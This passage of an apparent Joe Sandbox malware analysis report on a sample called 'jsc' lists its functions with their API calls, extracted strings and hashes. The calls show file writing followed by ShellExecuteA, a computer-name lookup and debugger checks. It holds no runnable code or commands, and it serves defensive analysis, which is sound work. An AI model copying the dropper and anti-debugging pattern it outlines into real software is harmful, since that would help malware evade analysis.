fopen.MSVCRT ref: 004012B0
fwrite.MSVCRT ref: 00401315
fclose.MSVCRT ref: 00401324

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 0040137C

Memory Dump Source

Source File: 00000005.00000002.1894631200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1894631200.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_jsc.jbxd

Similarity

API ID: ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 98952953-0
Opcode ID: 0f4da1f8d08ae24b23e21a7b5edb86ad3da502e7dc5ad60817f7f8c374c3531b
Instruction ID: d67c68ba952a1c37cb74649b334301b20e102581f4abded2b829d14b8e5be611
Opcode Fuzzy Hash: 0f4da1f8d08ae24b23e21a7b5edb86ad3da502e7dc5ad60817f7f8c374c3531b
Instruction Fuzzy Hash: A84132F0E001049BEB18D798CC51B9973A9DB55309F1405BDF506FB291EA39AE84CB69

Function 004014AD Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014C7
__set_app_type.MSVCRT ref: 004014E0
_controlfp.MSVCRT ref: 004014F4
__getmainargs.MSVCRT ref: 00401522
exit.MSVCRT ref: 00401554

Memory Dump Source

Source File: 00000005.00000002.1894631200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1894631200.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_jsc.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: c70863970d0da193ea95a53f4c01e11acbd6fe46a4d4097a0f3dd9320f0225af
Instruction ID: 3ed864040282dddc46cbc686cd4207b01364fa14fd68b51c84f2918fe68ddd61
Opcode Fuzzy Hash: c70863970d0da193ea95a53f4c01e11acbd6fe46a4d4097a0f3dd9320f0225af
Instruction Fuzzy Hash: D1112DF5E00204AFCB40EBA8ED85F4B77ACAB48304F144475F904F3361E6B9E9448B69

Function 0315B180 Relevance: 6.1, APIs: 4, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE ref: 0315B2BA
WriteFile.KERNELBASE(?,?,00000004,?,00000000), ref: 0315B2E0

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 3abbb386d51e50609d7a77f7677850383a0df91993d5bec7c77a73eb66328cc4
Instruction ID: bd24ca3b19e2fa47670324900b3a68ac8ab775f12dab22d9a77917e25e168e7f
Opcode Fuzzy Hash: 3abbb386d51e50609d7a77f7677850383a0df91993d5bec7c77a73eb66328cc4
Instruction Fuzzy Hash: DA318B6040C384EFD751DB25880572EBBE4AFAE615F4CC59EFCB496281D3F9944887A3

Function 03177DF0 Relevance: 4.6, APIs: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 03177E0F

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: a6957753fed72c150b5d6bbf3ff21ea1b06696a88bb4937f55d741f6c59dad63
Instruction ID: 359caa57fb97fa9a53fc50ae5f1c0c322daa3f671fa277cc2db6bb96ce16eb27
Opcode Fuzzy Hash: a6957753fed72c150b5d6bbf3ff21ea1b06696a88bb4937f55d741f6c59dad63
Instruction Fuzzy Hash: D2212934A8D3407FDA39EB14CC0AFB9BA386F4DB51F8D44CAF498561D2D3A42548C267

Function 03155A3B Relevance: 3.1, APIs: 2, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,031555C0,?,00000000,00000000), ref: 03155A51
RtlExitUserThread.NTDLL(00000000), ref: 03155B11

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: 8a82b406723acbbe46280c0e127139e38bc2d09c040269ba65858e7b1edf3171
Instruction ID: bb28b9df791b23f8129433c75505746cf731de46fd0f2bd88ffe45bc24efa803
Opcode Fuzzy Hash: 8a82b406723acbbe46280c0e127139e38bc2d09c040269ba65858e7b1edf3171
Instruction Fuzzy Hash: DC112C2550D3C1CFD726CB688869726BFA65F5B224F1D02C6F8B28E1A3D369454C83A2

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

i*&!!u/s/(!=a@[mlc554c-k991]$!)<, xrefs: 0040106E

Memory Dump Source

Source File: 00000005.00000002.1894631200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1894631200.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_jsc.jbxd

Similarity

API ID: malloc
String ID: i*&!!u/s/(!=a@[mlc554c-k991]$!)<
API String ID: 2803490479-2224304729
Opcode ID: 6ad473e3d7fe9158c1acde196af2d92c49358fc5d47a9cc217abf66bd194a4d8
Instruction ID: 01b69ddd6a7163423e12e5d848ef507565a3d8b94cc01782238194285892dabd
Opcode Fuzzy Hash: 6ad473e3d7fe9158c1acde196af2d92c49358fc5d47a9cc217abf66bd194a4d8
Instruction Fuzzy Hash: AF110C74A05248EFCB04CFACD4907ADBBF1AF49308F1480AAE856E7391D635AE41DB45

Function 03155D20 Relevance: 2.5, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03155D6D

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 1b6559726207123de225cc88afc922c359489e763a840d829471496adc08af3c
Instruction ID: ac14e2240ad38cafa4f635178d21e4890a02b06aae6dea17442ad28540ee25a8
Opcode Fuzzy Hash: 1b6559726207123de225cc88afc922c359489e763a840d829471496adc08af3c
Instruction Fuzzy Hash: 67F0B453A04300EBDD3ED368ED4EB70AA1B5B0F62CF4D4196BDB3590A3D7521845C121

Function 03155F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3e92a7f4bb203a633dee065f195763ad67d004b45b28adad6495018d96d37b
Instruction ID: 7019f67644d4cfeab36fe2aec4b0feaa7b5c1cbae64e04900b4f8cbbcc1f659b
Opcode Fuzzy Hash: 2e3e92a7f4bb203a633dee065f195763ad67d004b45b28adad6495018d96d37b
Instruction Fuzzy Hash: 9B71C32284C380CFC73AC7288814675FB77AB5F220F8D96DAFCB78A1A2D77154548392

Function 03156490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6081fface21654ae5ca509061858769de74ca8a468ca85400d289c92b35a6f0
Instruction ID: 5522f8b765d2b8c5408711ee7f43a13789976fecc9c5c7ffc0dc91a5104ea711
Opcode Fuzzy Hash: f6081fface21654ae5ca509061858769de74ca8a468ca85400d289c92b35a6f0
Instruction Fuzzy Hash: 8E31AA6190C240DBCB35CB18C444339FAB56B9E611FCDB69AFCB58A1A2D7794044C7D2

Function 03156086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE ref: 0315608C

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 559f2d3ec3aef24514df4cc0e35aa47208b272f0f1d92544e4071813ff4c6c44
Instruction ID: 6e52039a19ab143f037f92e7291e82245924ba2f6dbb1a87fa0372d48d4dd049
Opcode Fuzzy Hash: 559f2d3ec3aef24514df4cc0e35aa47208b272f0f1d92544e4071813ff4c6c44
Instruction Fuzzy Hash: F101846280D340DFC729CB248454235BBB56F8F210F4DA69BBDB6DB1A2D7348544C7D2

Function 03154B70 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 03154B76

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: a8c3030518ce2472102bc3c65ea62082f8d6288ea894bc0109831029dbf6dc00
Instruction ID: 1b7477cf13986b9c81baa8aa0d599134eb594646489b949f1f377ddfa479d621
Opcode Fuzzy Hash: a8c3030518ce2472102bc3c65ea62082f8d6288ea894bc0109831029dbf6dc00
Instruction Fuzzy Hash: DEE092299C8501D7DE7CD32B8D09579D204E74C222FCE06937D72968A58FBC45E04093

Function 00401437 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1894631200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1894631200.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_jsc.jbxd

Similarity

API ID: memset$strcmp
String ID:
API String ID: 4285334728-0
Opcode ID: 600441d560e22a093a211af0caa9cf8317f25ae3766963edbefc0be5cbce567f
Instruction ID: 9edf723c0157b2782dda112e74a62b3b96b1f25180967965b390cc16b1d8e7d6
Opcode Fuzzy Hash: 600441d560e22a093a211af0caa9cf8317f25ae3766963edbefc0be5cbce567f
Instruction Fuzzy Hash: 6BF098B9A00209AFCB40DFA8D981D8E77FCBB48308F104075F958E7751E6B4EA449B58

Non-executed Functions

Function 03191361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 03191459
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 03191463
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 03191470

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c96ccaeadeb8637ca85e67f29709e4d6aebe8733f72986d77a05c8f3fbdea186
Instruction ID: c5b079a410c6478496d55d804f332dfc0669ec07d6c0b1769998c341c2ce4937
Opcode Fuzzy Hash: c96ccaeadeb8637ca85e67f29709e4d6aebe8733f72986d77a05c8f3fbdea186
Instruction Fuzzy Hash: 1931C475901229ABDF21DF64DD8879DBBB8AF0C310F5041EAE81DA7250EB309BC58F55

Function 03193F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,03193F13,00000003,031ADE80,0000000C,0319403D,00000003,00000002,00000000,?,03192038,00000003), ref: 03193F5E
TerminateProcess.KERNEL32(00000000,?,03193F13,00000003,031ADE80,0000000C,0319403D,00000003,00000002,00000000,?,03192038,00000003), ref: 03193F65
ExitProcess.KERNEL32 ref: 03193F77

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f7316ec4160ba58bfc56b0f43ff941f95063a84bf60f998b274934bdcdb189a2
Instruction ID: f0227360b9235be8acf3d5026085a4a49fa9e0db54afd4b6a6f337d55a481727
Opcode Fuzzy Hash: f7316ec4160ba58bfc56b0f43ff941f95063a84bf60f998b274934bdcdb189a2
Instruction Fuzzy Hash: 9FE04635004A08ABDF01BF28D808A583B79EF4C241F084826F8458A121CB35DD82DA90

Function 0050B794 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894631200.00000000004C5000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1894631200.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
Instruction ID: 315bfe87fcbd0ebc8a799b5f834b68f58b2605f5977be5b2d25679df069a3a61
Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
Instruction Fuzzy Hash: 1A31A2229052485AFF36895958C4ABD7F6CFFE17B4F1CC1A6E4504A2F2D3259C40C751

Function 03151130 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 031924FF Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 03192543

Part of subcall function 03193073: _free.LIBCMT ref: 03193090
Part of subcall function 03193073: _free.LIBCMT ref: 031930A2
Part of subcall function 03193073: _free.LIBCMT ref: 031930B4
Part of subcall function 03193073: _free.LIBCMT ref: 031930C6
Part of subcall function 03193073: _free.LIBCMT ref: 031930D8
Part of subcall function 03193073: _free.LIBCMT ref: 031930EA
Part of subcall function 03193073: _free.LIBCMT ref: 031930FC
Part of subcall function 03193073: _free.LIBCMT ref: 0319310E
Part of subcall function 03193073: _free.LIBCMT ref: 03193120
Part of subcall function 03193073: _free.LIBCMT ref: 03193132
Part of subcall function 03193073: _free.LIBCMT ref: 03193144
Part of subcall function 03193073: _free.LIBCMT ref: 03193156
Part of subcall function 03193073: _free.LIBCMT ref: 03193168

_free.LIBCMT ref: 03192538

Part of subcall function 03192096: HeapFree.KERNEL32(00000000,00000000,?,03193208,?,00000000,?,00000000,?,0319322F,?,00000007,?,?,03192697,?), ref: 031920AC
Part of subcall function 03192096: GetLastError.KERNEL32(?,?,03193208,?,00000000,?,00000000,?,0319322F,?,00000007,?,?,03192697,?,?), ref: 031920BE

_free.LIBCMT ref: 0319255A
_free.LIBCMT ref: 0319256F
_free.LIBCMT ref: 0319257A
_free.LIBCMT ref: 0319259C
_free.LIBCMT ref: 031925AF
_free.LIBCMT ref: 031925BD
_free.LIBCMT ref: 031925C8
_free.LIBCMT ref: 03192600
_free.LIBCMT ref: 03192607
_free.LIBCMT ref: 03192624
_free.LIBCMT ref: 0319263C

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 22e56b7968a9e778801f312211bfdce5de9751aa7530e763bb03664bc9bdf8b1
Instruction ID: 4134d3352d7c7ead57a67b9212b92370abea97f92b31fceef91006476bca9d01
Opcode Fuzzy Hash: 22e56b7968a9e778801f312211bfdce5de9751aa7530e763bb03664bc9bdf8b1
Instruction Fuzzy Hash: 66311C75A00309BBFF31EA39D844B96B3E9BB08251F194C5BE89ADB150DB71E942CB10

Function 03191A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDecodePointer.NTDLL(00000000), ref: 03191A3E

Strings

sqrt, xrefs: 03191BC2
asin, xrefs: 03191BAA
acos, xrefs: 03191BB6
exp, xrefs: 03191B03, 03191B65
pow, xrefs: 03191B22, 03191BCE, 03191BE1
log, xrefs: 03191AE4, 03191AF0
log10, xrefs: 03191A88, 03191AD8

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: ae30fdcc70174901817ed2d9c6cb9f73001197fe7fd1ab8449141d2df2279760
Instruction ID: 18dee3da7efbc09330c2fb53c5ca69b8e2473a099968f849bfc19faa0285c903
Opcode Fuzzy Hash: ae30fdcc70174901817ed2d9c6cb9f73001197fe7fd1ab8449141d2df2279760
Instruction Fuzzy Hash: A8519E7890090BEBEF04DF68EA482ECBBB5FF4D311F5505A6D482B7254DB3189A4CB54

Function 03197B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,03198311,?,00000000,?,00000000,00000000), ref: 03197BDE
__fassign.LIBCMT ref: 03197C59
__fassign.LIBCMT ref: 03197C74
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 03197C9A
WriteFile.KERNEL32(?,?,00000000,03198311,00000000,?,?,?,?,?,?,?,?,?,03198311,?), ref: 03197CB9
WriteFile.KERNEL32(?,?,00000001,03198311,00000000,?,?,?,?,?,?,?,?,?,03198311,?), ref: 03197CF2

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0b8b6608ac16803d981b408d6c019c07d12aed4cb1480423fb1b4f9e997de58d
Instruction ID: ef69264db0cacda7bd882cb62bb810dbd05a7176231bbbc48ece11622f54e018
Opcode Fuzzy Hash: 0b8b6608ac16803d981b408d6c019c07d12aed4cb1480423fb1b4f9e997de58d
Instruction Fuzzy Hash: 05515D71A102499FDF14CFA8DC95AEEBBF8EF0D310F14455AE555E7281E730A981CBA0

Function 03193216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 031931DA: _free.LIBCMT ref: 03193203

_free.LIBCMT ref: 03193264

Part of subcall function 03192096: HeapFree.KERNEL32(00000000,00000000,?,03193208,?,00000000,?,00000000,?,0319322F,?,00000007,?,?,03192697,?), ref: 031920AC
Part of subcall function 03192096: GetLastError.KERNEL32(?,?,03193208,?,00000000,?,00000000,?,0319322F,?,00000007,?,?,03192697,?,?), ref: 031920BE

_free.LIBCMT ref: 0319326F
_free.LIBCMT ref: 0319327A
_free.LIBCMT ref: 031932CE
_free.LIBCMT ref: 031932D9
_free.LIBCMT ref: 031932E4
_free.LIBCMT ref: 031932EF

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction ID: 82eb5253eee804f2f41e77e88a57552646cc97a4bde6dfe5fbce9485b9218774
Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction Fuzzy Hash: 05110D7EA40B08BBED30FBB0CC09FCB779C6F09740F444C26AABA6E060DB75A5058651

Function 031944E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0319473A,?,?,00000000), ref: 03194543
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0319473A,?,?,00000000,?,?,?), ref: 031945C9
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 031946C3
__freea.LIBCMT ref: 031946D0

Part of subcall function 031932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0319332C

__freea.LIBCMT ref: 031946D9
__freea.LIBCMT ref: 031946FE

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: ae050cd15be7798991688d1082dc85467663a24e510cb333ab660c3addc55ae4
Instruction ID: 85a6a1d2bf5e9b55211af991ffaa872a0cb943227a263c59baf1b004f76c4701
Opcode Fuzzy Hash: ae050cd15be7798991688d1082dc85467663a24e510cb333ab660c3addc55ae4
Instruction Fuzzy Hash: 1051D3B6600216AFFF29DE66CC40EAF77A9EB4C650B19462AFC04DB140EF74DC92C650

Function 0319185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0318FDB7), ref: 0319185F
_free.LIBCMT ref: 03191892
_free.LIBCMT ref: 031918BA
SetLastError.KERNEL32(00000000), ref: 031918C7
SetLastError.KERNEL32(00000000), ref: 031918D3
_abort.LIBCMT ref: 031918D9

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 6636a880006ddcc8ff5d0118b94b9a8cd678fb1f7890b44361ca2a7972e3ee9f
Instruction ID: 01ccad1eed3523bb38035c49eb8849355e9fb9b754dea5fb4b3ab97b3076c026
Opcode Fuzzy Hash: 6636a880006ddcc8ff5d0118b94b9a8cd678fb1f7890b44361ca2a7972e3ee9f
Instruction Fuzzy Hash: CBF0F43E5007063BFE19F635AC08E2A125A9FCD661B6E05B7F8159A280EF3988C79120

Function 03193FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,03193F73,00000003,?,03193F13,00000003,031ADE80,0000000C,0319403D,00000003,00000002), ref: 03193FE2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 03193FF5
FreeLibrary.KERNEL32(00000000,?,?,?,03193F73,00000003,?,03193F13,00000003,031ADE80,0000000C,0319403D,00000003,00000002,00000000), ref: 03194018

Strings

mscoree.dll, xrefs: 03193FDB
CorExitProcess, xrefs: 03193FED

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 730f103d9c75aa72c5f320f588dde9237dc6c44e45b5616104f4c9e2800891ec
Instruction ID: 9c5dfe033b3f8d1e18e5d1666850c673c630cb14252b40be94d310fb5ef80a22
Opcode Fuzzy Hash: 730f103d9c75aa72c5f320f588dde9237dc6c44e45b5616104f4c9e2800891ec
Instruction Fuzzy Hash: AFF04F70A00218BBDF15EF95D809BEEBFB5EF0C652F090066E805A6150DF759A85CBA0

Function 031918DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,?,?,031915D8,03193CBB,?,03191D2A,?,?,00000000), ref: 031918E4
_free.LIBCMT ref: 03191919
_free.LIBCMT ref: 03191940
SetLastError.KERNEL32(00000000,?,03191D2A,?,?,00000000), ref: 0319194D
SetLastError.KERNEL32(00000000,?,03191D2A,?,?,00000000), ref: 03191956

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3aa97a1fce0263ce8bec7b28bacb513204aa3d6e46476601b0439beb8ce0e83c
Instruction ID: 1fec72a3c37a2731d16ae910eee4f26623be382bb5bf49d6a1fa75c4473d4054
Opcode Fuzzy Hash: 3aa97a1fce0263ce8bec7b28bacb513204aa3d6e46476601b0439beb8ce0e83c
Instruction Fuzzy Hash: 8501D13A2007077BFF1AF6756C88A6B266D9BCD27571A0437F916AA241FB7588C74020

Function 03193171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 03193189

Part of subcall function 03192096: HeapFree.KERNEL32(00000000,00000000,?,03193208,?,00000000,?,00000000,?,0319322F,?,00000007,?,?,03192697,?), ref: 031920AC
Part of subcall function 03192096: GetLastError.KERNEL32(?,?,03193208,?,00000000,?,00000000,?,0319322F,?,00000007,?,?,03192697,?,?), ref: 031920BE

_free.LIBCMT ref: 0319319B
_free.LIBCMT ref: 031931AD
_free.LIBCMT ref: 031931BF
_free.LIBCMT ref: 031931D1

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: edbcd3b2dea64886f858bb0700883b7a568fdf5d1a8035977552c2cd26d82e4c
Instruction ID: 7b0457f9527f43f59ea4b8384a216052896f522f8a2ea62d22e021b6cd0231e4
Opcode Fuzzy Hash: edbcd3b2dea64886f858bb0700883b7a568fdf5d1a8035977552c2cd26d82e4c
Instruction Fuzzy Hash: 75F0FF7A604304BBEE38FA64E585C16B3D9BA0C65175D0C1BF459DB614DB30F8818A64

Function 031934FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 0319354C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 031935D5
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 031935E7
__freea.LIBCMT ref: 031935F0

Part of subcall function 031932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0319332C

Memory Dump Source

